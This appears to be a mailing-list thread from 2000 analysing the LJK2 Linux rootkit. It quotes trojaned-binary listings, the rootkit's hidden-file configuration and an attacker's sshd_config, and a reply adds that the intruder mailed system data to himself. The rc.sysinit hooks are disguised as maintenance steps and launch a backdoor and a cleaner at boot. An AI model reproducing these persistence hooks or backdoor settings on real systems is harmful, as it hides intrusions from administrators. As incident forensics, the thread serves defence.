Security Incidents mailing list archives

Re: LJK2 rootkit?

From: egon.barfuss () SNB AT (Egon Barfuß jun.)
Date: Wed, 17 May 2000 11:25:11 +0200


Hi!

A few weeks ago we had the same rootkit installed on a server of our customers. You should
check your mail-logfiles because the intruder sends himself a mail with some systemdata of
your server. At that time he used a hotmailaccount "lawkxxx () hotmail com". After contacting
hotmail to help us catching this intruder by sending us parts of their logfiles where we
could get the ip-addresses he usally used nothing came back. Some mails later hotmail
deaktivated the account but did nothing more to help us. Because the mail to himself never
reached him (sendmail was not running on this machine) he tried to come back but at this
point the rootkit was deleted and the server more secured than before so I could catch his
ip-address...

Egon

Felix Schueren wrote:

A webserver's DNS service stopped working "overnight", and when I checked it
out first thing in the morning, trying to run "top" dumped me to a somewhat
broken (no visible chars at all) shell. Curious, I checked the procps RPM
checksum from a CD vs. the installed one, and it turned out to be different.
I then checked all the RPMs vs the original versions from CD:

S.5..UG.   /bin/ls
S.5..UG.   /usr/bin/locate
S.5....T c /etc/rc.d/rc.sysinit
S.5..UG.   /sbin/syslogd
S.5..UG.   /bin/netstat
S.5..UG.   /sbin/ifconfig
S.5..UG.   /bin/ps
SM5..UG.   /usr/bin/top
SM5..UG.   /usr/bin/pstree
SM5..UG.   /bin/login
.M......   /usr/bin/makemap

/* failure codes:
5 - MD5 sum
S - File size
L - Symlink
T - Mtime
D - Device
U - User
G - Group
M - Mode (includes permissions and file type)
*/

The user/group that all of those files had was 532/532. A search for all
files owned by UID 532 revealed:
++++++++++++++++++++++++++++++++++++++
55185  134 -rwxr-xr-x   1 532      532        136491 Aug  6  1998
 /bin/ls
55186   30 -rwxr-xr-x   1 532      532         30628 Sep  3  1998
 /bin/netstat
55187   37 -r-xr-xr-x   1 532      532         36959 Oct  3  1998
 /bin/ps
55199   25 -r-sr-xr-x   1 532      532         24772 Oct 14  1998
 /bin/login
55183   20 -rwxr-xr-x   1 532      532         19700 Sep  3  1998
 /sbin/ifconfig
55201  255 -rwxr-xr-x   1 532      532        260476 Nov 16  1999
 /sbin/syslogd
55182   28 -rwxr-xr-x   1 532      532         27751 Jul 29  1998
 /usr/bin/locate
55203   56 -rwxr-xr-x   1 532      532         56794 Oct  3  1998
 /usr/bin/top
55188   32 -rwxr-xr-x   1 532      532         32177 Sep 11  1998
 /usr/bin/pstree
55178    1 -rw-r--r--   1 532      532           131 May 14 21:07
 /usr/lib/libmen.oo/.LJK2/hide/.RK1addr
55180    1 -rw-r--r--   1 532      532            77 May 14 20:47
 /usr/lib/libmen.oo/.LJK2/hide/.RK1log
55179    1 -rw-r--r--   1 532      532            76 Apr 12 13:57
 /usr/lib/libmen.oo/.LJK2/hide/.RK1dir
55181    1 -rw-r--r--   1 532      532            44 May 14 21:07
 /usr/lib/libmen.oo/.LJK2/hide/.RK1proc
55194    5 -rwxr-xr-x   1 532      532          4098 Sep 12  1999
 /usr/lib/libmen.oo/.LJK2/hide/RK1phidemod.c
55191    4 -rwxr-xr-x   1 532      532          3407 Feb 15 20:08
 /usr/lib/libmen.oo/.LJK2/modules/RK1hidem.c
55193   25 -rwxr-xr-x   1 532      532         24860 Mar  3 20:22
 /usr/lib/libmen.oo/.LJK2/modules/RK1phide
55195    2 -rwxr-xr-x   1 532      532          1345 Sep  9  1999
 /usr/lib/libmen.oo/.LJK2/clean/RK1sauber
55200    8 -rwxr-xr-x   1 532      532          7538 Mar  6 00:02
 /usr/lib/libmen.oo/.LJK2/clean/RK1wted
55196   10 -rwxr-xr-x   1 532      532          9361 Sep  9  1999
 /usr/lib/libmen.oo/.LJK2/hack/RK1sniff
55192    7 -rwxr-xr-x   1 532      532          6232 Sep  9  1999
 /usr/lib/libmen.oo/.LJK2/hack/RK1parse
136797  568 -rwxr-xr-x   1 532      532        580696 Feb 18 23:24
 /usr/lib/libmen.oo/.LJK2/sshconfig/RK1ssh
55173    1 -rw-r--r--   1 532      532           880 Feb 18 23:24
 /usr/lib/libmen.oo/.LJK2/ssh_config
55174    1 -rw-r--r--   1 532      532           542 Feb 18 23:24
 /usr/lib/libmen.oo/.LJK2/ssh_host_key
55175    1 -rw-r--r--   1 532      532           329 Mar  6 00:34
 /usr/lib/libmen.oo/.LJK2/ssh_host_key.pub
55176    1 -rwxr-xr-x   1 532      532           512 May 15 13:46
 /usr/lib/libmen.oo/.LJK2/ssh_random_seed
55177    1 -rw-r--r--   1 532      532           723 Feb 18 23:24
 /usr/lib/libmen.oo/.LJK2/sshd_config
144926   26 -rwxr-xr-x   1 532      532         26352 Mar  3 20:06
 /usr/sbin/rhxclean
55198  600 -rwxr-xr-x   1 532      532        613543 Feb 18 23:24
 /usr/sbin/rpmrhup
++++++++++++++++++++++++++++++++++++++

When I checked the rc.sysinit file, the following two suspicious entries
were to be found at the very end of the file:
+++++++++++++++
# There is a RPM database which,
# needs to be updated.
if [ -x /usr/sbin/rpmrhup ]; then
/usr/sbin/rpmrhup -p 60569
fi

# Since there are lost procs,
# we must clean them up.
if [ -x /usr/sbin/rhxclean ]; then
/usr/sbin/rhxclean
fi
+++++++++++++++
Noteworthy: The bad english. The misplaced comma is a "common" european
error, would fit in nicely with the notes further down.

Here's the complete listing of the .LJK2 directory structure (this is out of
a backup tar, the UIDs are broken by now):
+++++++++++++++++++++++
[machine]# ls -la *
-rw-r--r--   1 root     root          880 Feb 18 21:24 ssh_config
-rw-r--r--   1 root     root          542 Feb 18 21:24 ssh_host_key
-rw-r--r--   1 root     root          329 Mar  5 22:34 ssh_host_key.pub
-rwxr-xr-x   1 root     root          512 May 15 10:46 ssh_random_seed*
-rw-r--r--   1 root     root          723 Feb 18 21:24 sshd_config

backdoor:
total 29
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root        26352 May 14 17:47 RK1bd*

backup:
total 250
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root        12972 Aug  6  1998 du*
-rwxr-xr-x   1 root     root        25596 Sep  2  1998 ifconfig*
-rw-r--r--   1 root     root         3442 May 14 17:46 inetd.conf
-rwxr-xr-x   1 root     root         7560 Jul 29  1998 locate*
-rws--x--x   1 root     root        15284 Oct 14  1998 login*
-rwxr-xr-x   1 root     root        29308 Aug  6  1998 ls*
-rwxr-xr-x   1 root     root        39168 Sep  2  1998 netstat*
-r-xr-xr-x   1 root     root        12708 Oct  3  1998 ps*
-r-xr-xr-x   1 root     root        10176 Sep 11  1998 pstree*
-rwxr-xr-x   1 root     root         7165 Oct 15  1998 rc.sysinit*
-rwxr-xr-x   1 root     root        24988 Nov 16  1999 syslogd*
-rwxr-xr-x   1 root     root        19640 Aug 22  1998 tcpd*
-r-xr-xr-x   1 root     root        30772 Oct  3  1998 top*
clean:
total 12
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root         1345 Sep  9  1999 RK1sauber*
-rwxr-xr-x   1 root     root         7538 Mar  5 22:02 RK1wted*

hack:
total 19
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root         6232 Sep  9  1999 RK1parse*
-rwxr-xr-x   1 root     root         9361 Sep  9  1999 RK1sniff*

hide:
total 11
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rw-r--r--   1 root     root          131 May 14 18:07 .RK1addr
-rw-r--r--   1 root     root           76 Apr 12 10:57 .RK1dir
-rw-r--r--   1 root     root           77 May 14 17:47 .RK1log
-rw-r--r--   1 root     root           44 May 14 18:07 .RK1proc
-rwxr-xr-x   1 root     root         4098 Sep 12  1999 RK1phidemod.c*

modules:
total 33
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root          336 Apr 12 11:02 README.modules*
-rwxr-xr-x   1 root     root         3407 Feb 15 18:08 RK1hidem.c*
-rwxr-xr-x   1 root     root        24860 Mar  3 18:22 RK1phide*

sshconfig:
total 574
drwxr-xr-x   2 root     root         1024 May 16 07:53 ./
drwxr-xr-x   9 root     root         1024 May 16 07:53 ../
-rwxr-xr-x   1 root     root       580696 Feb 18 21:24 RK1ssh*
+++++++++++++++++++++++
worthy to point out: ./clean/RK1sauber could very well be a hint on the
nationality of the attacker, or the point of origin of the package: "sauber"
is german for "clean".
Also: the backup of inetd.conf is the original version w/o telnet, the /etc/inetd.conf
had telnet services enabled after the package ran.

A few files of interest:
[root@machine]# cat .LJK2/hide/.RK1addr
1 212.204
1 62.236
2 212.204
2 62.236
3 76335
4 76335
4 6667
4 5556
4 6666
4 6664
4 6668
3 60569
4 60569
2 213.48
2 210.225
3 4103

next file:
[root@machine]# cat .LJK2/hide/.RK1log
RK1
.LJK2
synscan
76335
212.204
195.114
62.236
204.29
rpmrhup
rhxclean
60569

next:
[root@machine]# cat .LJK2/hide/.RK1dir
libmen.oo
.LJK2
rc.sysinit
lockit25.tgz
lockit25.tar
lockit25.tar.gz
lockit

and:
[root@machine]# less .LJK2/hide/.RK1proc
2 synscan
3 RK1
2 rpmrhup
2 rhxclean
3 sshd

./LJK2/ssh_host_key contains the string "root () www bigwigauctions com"
./LJK2/ssh_host_key.pub contains the string "root@LJK2"
./LJK2/sshd_config is a standard SSHd config file, contents:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# This is ssh server systemwide configuration file.

Port 22
ListenAddress 0.0.0.0
HostKey /usr/lib/libmen.oo/.LJK2/ssh_host_key
RandomSeed /usr/lib/libmen.oo/.LJK2/ssh_random_seed
ServerKeyBits 768
LoginGraceTime 600
KeyRegenerationInterval 3600
PermitRootLogin yes
IgnoreRhosts no
StrictModes yes
QuietMode no
X11Forwarding yes
X11DisplayOffset 10
FascistLogging no
PrintMotd yes
KeepAlive yes
SyslogFacility DAEMON
RhostsAuthentication no
RhostsRSAAuthentication yes
RSAAuthentication yes
PasswordAuthentication yes
PermitEmptyPasswords yes
UseLogin no
# CheckMail no
# PidFile /u/zappa/.ssh/pid
# AllowHosts *.our.com friend.other.com
# DenyHosts lowsecurity.theirs.com *.evil.org evil.org
# Umask 022
# SilentDeny yes
+++++++++++++++++++++++++++++++++++++++++++

This looks similiar to (but not exactly like) the CERT Advisory
described in the summary http://www.cert.org/summaries/CS-98.04.html

The version of BIND running was bind-8.1.2-5 (yeah...I know...), and I got a
couple of "lame server on..." messages and lots of named restarts around the
time I place the intrusion.

Any ideas on whether or not it would be possible to retrieve the Point of
origin of the attack? Also, was this a known package? I haven't been able to
find anything about "LJK2"..

Oh, and while the machine itself has been restored, I have a full backup
available, so if you have any further questions about files etc I'll be glad
to dig them out.

regards,

felix

Current thread:

Re: IP Black list? (Track yes, Block no), (continued)
- - - Re: IP Black list? (Track yes, Block no) Bryan Andersen (May 16)
  - You can now track Bugtraq via software (fwd) Alfred Huger (May 15)
- Re: IP Black list? Mike Shannon (May 15)
  - LJK2 rootkit? Felix Schueren (May 16)
    - Re: LJK2 rootkit? Jose Nazario (May 16)
    - IP blacklists phi-incident () EXORSUS NET (May 16)
    - Re: LJK2 rootkit? Omachonu Ogali (May 16)
    - Re: LJK2 rootkit? Jose Nazario (May 18)
    - Re: LJK2 rootkit? Omachonu Ogali (May 18)
    - Re: LJK2 rootkit? Jens Hektor (May 17)
    - Re: LJK2 rootkit? Egon Barfuß jun. (May 17)
    - Korea Damian Gerow (May 17)
  - Re: IP Black list? Ryan Russell (May 16)
    - Re: IP Black list? Tabor J. Wells (May 16)
- Re: IP Black list? Luff, Darryl (May 15)
  - Re: IP Black list? Michael Damm (May 15)
    - Re: IP Black list? jms (May 15)
    - TCP/IP options flags? Matt Beck (May 16)
    - unapproved update from [166.93.60.5].61946 James Ankenbrandt (May 17)
    - Re: unapproved update from [166.93.60.5].61946 Jon Lewis (May 18)
- Re: IP Black list? Volker Werth [VWSoft] (May 16)

(Thread continues...)